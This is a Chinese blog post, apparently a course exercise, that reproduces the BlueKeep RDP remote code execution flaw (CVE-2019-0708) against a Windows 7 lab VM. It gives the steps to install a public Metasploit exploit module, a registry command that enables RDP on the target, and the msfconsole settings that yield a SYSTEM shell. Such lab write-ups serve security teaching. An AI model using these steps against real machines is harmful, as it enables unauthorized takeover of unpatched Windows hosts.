title: CVE-2019-0708远程桌面代码执行漏洞复现
date: '2019-11-29 15:59:14'
updated: '2019-11-29 16:36:23'
tags: [漏洞复现, 渗透测试]
permalink: /articles/2019/11/29/1575014354323.html
---
![](https://img.hacpai.com/bing/20180915.jpg?imageView2/1/w/960/h/540/interlace/1/q/100) 

网络安全课老师让我们试着用`msf`进行一次渗透测试，正好用最新的`bluekeep`漏洞练练手。

<!-- more -->

# 1. 漏洞描述

---

在2019年5月，微软发布了针对远程代码执行漏洞CVE-2019-0708的补丁更新，该漏洞也成为“bluekeep”，漏洞存在于远程桌面服务（RDS）的代码中。该漏洞是预身份验证，无需与用户交互，因此具有潜在武器化蠕虫性漏洞利用的危险。如果成功利用此漏洞，则可以使用“系统”权限执行任意代码。

**影响版本：**

- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows 2003
- Windows XP

# 2. 漏洞复现

## 0x01 环境准备

### 靶机配置

准备`Windows 7 sp1`版本作为本次试验的靶机

![win7配置.png](https://i.loli.net/2019/09/10/Jjgs2IWx5qFerlG.png)

下载安装到虚拟机即可。

**下载链接如下：**

```
ed2k://|file|cn_windows_7_professional_with_sp1_x64_dvd_u_677031.iso|3420557312|430BEDC0F22FA18001F717F7AF08C9D5|/
```

靶机IP地址如下：

![win7IP.png](https://i.loli.net/2019/09/10/9dsxPcek1G54M8f.png)

### 宿主机配置

因为我们要用到`msfconsole`的攻击模块进行攻击，所以我们宿主机使用`kali`进行渗透测试

在[github](https://github.com/NAXG/cve_2019_0708_bluekeep_rce)上下载本次测试所用的`RCE`

并将文件移动到相应位置

```
cve_2019_0708_bluekeep_rce.rb > /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb > /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb > /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb > /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
```

## 0x02 开始测试

首先用`nmap`检测靶机是否开放`3389`端口。

![nmapfor2.15.png](https://i.loli.net/2019/09/10/PwnMKSrQj7TF2fG.png)

**注意:**

​	如果没有开放，则在靶机中管理员运行`cmd`，输入：

```
	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" 		"Server /v 
fDenyTSConnections /t REG_DWORD /d 00000000 /f
```



然后终端打开`msfconsole`，进入后使用`reload_all`重新加载`0708 rdp`利用模块，并查找到模块地址。

![search_0708.png](https://i.loli.net/2019/09/10/6NwDMJAGlhyvHFU.png)

使用攻击模块

```
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
```

使用`info`查看模块相关信息和配置

![info_0708.png](https://i.loli.net/2019/09/10/rTUHR4y2vnkK9aV.png)

设置模块配置信息

```
set RHOST 10.0.2.15 	//靶机IP
set RPORT 3389				//靶机端口
set target 2						//靶机机器框架
```

![set_0708.png](https://i.loli.net/2019/09/10/wQugeZ5ropP1Rj6.png)



使用`exploit`进行攻击，等待建立链接

![run_0708.png](https://i.loli.net/2019/09/10/kn9jzJHAThbpRgf.png)

建立连接以后就拿到了`shell`，可以执行任意命令

![getshell_0708.png](https://i.loli.net/2019/09/10/kds5lrJhjtCvgSV.png)
